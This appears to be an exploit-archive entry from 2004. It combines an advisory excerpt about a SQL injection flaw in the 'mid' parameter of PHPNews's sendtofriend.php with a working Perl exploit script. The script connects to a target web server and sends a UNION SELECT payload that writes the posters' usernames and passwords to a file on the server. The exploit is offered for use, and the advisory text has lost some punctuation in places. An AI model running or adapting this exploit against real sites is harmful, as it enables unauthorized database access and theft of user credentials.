Simple remote exploit for the SQL injection vulnerability discovered in PHPNews.
c5de8860494ec9c6c1f6fd843c7a558b1fee55f076ab1a36f0363084f66befb4
SQL Injection vulnerability in PHPNews
11/25/2004
Description:
A vulnerability has been reported in PHPNews, which can be exploited
by malicious people to conduct SQL injection attacks
Input passed to the "mid" parameter in "sendtofriendphp"
is not properly sanitised before being used in a SQL query This can
be exploited to manipulate SQL queries by injecting arbitrary SQL code
The vulnerability has been reported in version 123 Other versions may
also be affected
Provided and/or discovered by:
Reported by vendor
http://secunia.com/advisories/13300/
simple exploit-test written by ruggine
ruggine@autistici.org
n.b. Use at your own risk! :P
--------------------------------- snip here
#!/usr/bin/perl -w
use Socket;
unless (@ARGV > 2) { die "usage: $0 mid_number /path_to_phpnews/ ip_host\n".
"f.e. phpnews 1 /phpnews/ 192.168.0.1\n"};
my $mid_number = $ARGV[0];
my $path_to_phpnews = $ARGV[1];
my $host = $ARGV[2];
my $port = 80;
my $EOL = "\015\012";
my $inj = "%20union%20select%20username,password%20from%20phpnews_posters%20into%20outfile%20'/tmp/ghghgh'";
my $packet = "GET " . $path_to_phpnews . "sendtofriend.php?mid=" . $mid_number . $inj . " HTTP/1.0" . $EOL. $EOL;
my $protocol = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,$protocol) or die "no socket :-(";
connect(SOCKET,$paddr) or die "no connect :-(";
send(SOCKET,$packet,0) or die "no send :-(";
@lines = <SOCKET>;
print @lines;
close SOCKET or die "no close :-(";
-------------------------------------------end snip